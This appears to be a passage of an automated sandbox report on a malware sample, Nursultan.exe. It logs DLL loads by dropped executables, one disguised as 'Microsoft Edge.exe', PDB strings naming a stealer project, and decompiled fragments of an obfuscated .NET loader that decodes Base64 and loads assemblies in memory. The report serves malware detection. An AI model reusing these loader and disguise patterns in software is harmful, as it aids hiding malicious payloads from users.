                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                            Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\Nursultan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                            Source: Microsoft Edge.lnk.3.drLNK file: ..\..\..\..\..\Microsoft Edge
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\Nursultan.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: Nursultan.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: Nursultan.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mscorlib.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\maksi\Desktop\44CALIBER-main\44CALIBER\obj\Release\Insidious.pdb source: Insidious.exe, 0000000B.00000002.2166607567.00000245126B4000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr
                            Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.QX1otp43pCr270RBikE2tHyt3ltMxIr3hglxbsP1bc7tbef8hypl9zzK3qlD8YXBQDzDGLZ,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.u4PcIibrlkezPdTxO1vwIM5GeUss0ADNtfrjmYxeYLap5rrJw4HzjQg013jrwmw040aK5JU,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.U38QlaH5fPyjvxgXkicJPhgPZd6lOtTNrTguDzJai9UUEiLYuqGuSdsjs7l7OCOeRiNeXQm,QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.TcrG86Tpz593KCYJ4Jy9eDMgmsV2VIBsSD3HsK0FbLcXF30oYmC668gJCIrbyThCT7rRKKV,_8IQtID4yHRI2I._4vI9eIQ2Jbf0sfLGtbp63cbGwyCSRTLzpmOGrjmSAkTs9CgKXxXb05X5xlLatTYUyMBg6wNF2dV1uYHRfYyQIc51E()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Di7oyl5G2A3kt[2],_8IQtID4yHRI2I.esoPb8YWZwzLh8I4kDgGdErQcOG3uGHm7j80aNjYwQoYtwmn3KoxsWxNQi4ydkguhStx7RXGz6sQe0st74Vz1cG8U(Convert.FromBase64String(Di7oyl5G2A3kt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs.Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
                            Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
                            Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs.Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj
                            Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs.Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
                            Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
                            Source: Microsoft Edge.3.dr, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs.Net Code: OJ3ab2FppO7ZZ System.AppDomain.Load(byte[])
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj System.AppDomain.Load(byte[])
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, oaBdkauKNCaML.cs.Net Code: WWSigm2Nfo0Hj
                            Source: Insidious.exe.4.drStatic PE information: 0xB967FC00 [Fri Jul 27 07:28:00 2068 UTC]
                            Source: C:\Users\user\Desktop\Nursultan.exeCode function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1
                            Source: C:\Users\user\Desktop\Nursultan.exeCode function: 0_2_00007FF848E61149 push ebx; iretd 0_2_00007FF848E6114A
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 2_2_00007FF848E700BD pushad ; iretd 2_2_00007FF848E700C1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E595D3 pushad ; retf 3_2_00007FF848E5960B
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 4_2_00007FF848E600BD pushad ; iretd 4_2_00007FF848E600C1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 5_2_00007FF848E700BD pushad ; iretd 5_2_00007FF848E700C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D5D2A5 pushad ; iretd 6_2_00007FF848D5D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848E700BD pushad ; iretd 6_2_00007FF848E700C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F40835 pushfd ; retf 6_2_00007FF848F40837
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F42316 push 8B485F93h; iretd 6_2_00007FF848F4231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F42185 pushfd ; retf 6_2_00007FF848F42187
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 10_2_00007FF848E600BD pushad ; iretd 10_2_00007FF848E600C1
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848E95995 push ebx; retf 11_2_00007FF848E959DA
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848EA8148 push ebx; ret 11_2_00007FF848EA816A
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848EA812B push ebx; ret 11_2_00007FF848EA816A
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848E9021D push E95D8C98h; ret 11_2_00007FF848E90259
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 11_2_00007FF848E93DE8 push ebx; retf 11_2_00007FF848E959DA
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 12_2_00007FF848E700BD pushad ; iretd 12_2_00007FF848E700C1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8BF9D pushad ; retf 14_2_00007FF848E8BFAB
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E8BF48 push eax; retf 14_2_00007FF848E8BF8B
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF848E700BD pushad ; iretd 14_2_00007FF848E700C1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849045CE2 push ecx; retn 5F30h14_2_00007FF8490462DC
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 14_2_00007FF849045159 pushad ; ret 14_2_00007FF849045169
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 23_2_00007FF848E912FD push esp; retn 4810h23_2_00007FF848E916C6
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 23_2_00007FF848E9021D push E95D8C98h; ret 23_2_00007FF848E90259
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeCode function: 25_2_00007FF848E900BD pushad ; iretd 25_2_00007FF848E900C1
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 26_2_00007FF848E600BD pushad ; iretd 26_2_00007FF848E600C1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeCode function: 27_2_00007FF848E700BD pushad ; iretd 27_2_00007FF848E700C1
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 28_2_00007FF848E810F1 push ebx; iretd 28_2_00007FF848E8114A
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeCode function: 28_2_00007FF848E800BD pushad ; iretd 28_2_00007FF848E800C1
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeCode function: 38_2_00007FF848E600BD pushad ; iretd 38_2_00007FF848E600C1
                            Source: Nursultan.exeStatic PE information: section name: .text entropy: 7.996941736899731
                            Source: Nursultan.exe.0.drStatic PE information: section name: .text entropy: 7.996896093958196
                            Source: Nursultan2.exe.2.drStatic PE information: section name: .text entropy: 7.994459843214496
                            Source: Microsoft Edge.exe.0.dr, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.csHigh entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
                            Source: Microsoft Edge.exe.0.dr, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.csHigh entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
                            Source: Microsoft Edge.exe.0.dr, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
                            Source: Microsoft Edge.exe.0.dr, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.csHigh entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
                            Source: Microsoft Edge.exe.0.dr, jHz7doq0Y7v0T.csHigh entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
                            Source: Microsoft Edge.exe.0.dr, OHxtQZ957hKI5.csHigh entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
                            Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.csHigh entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
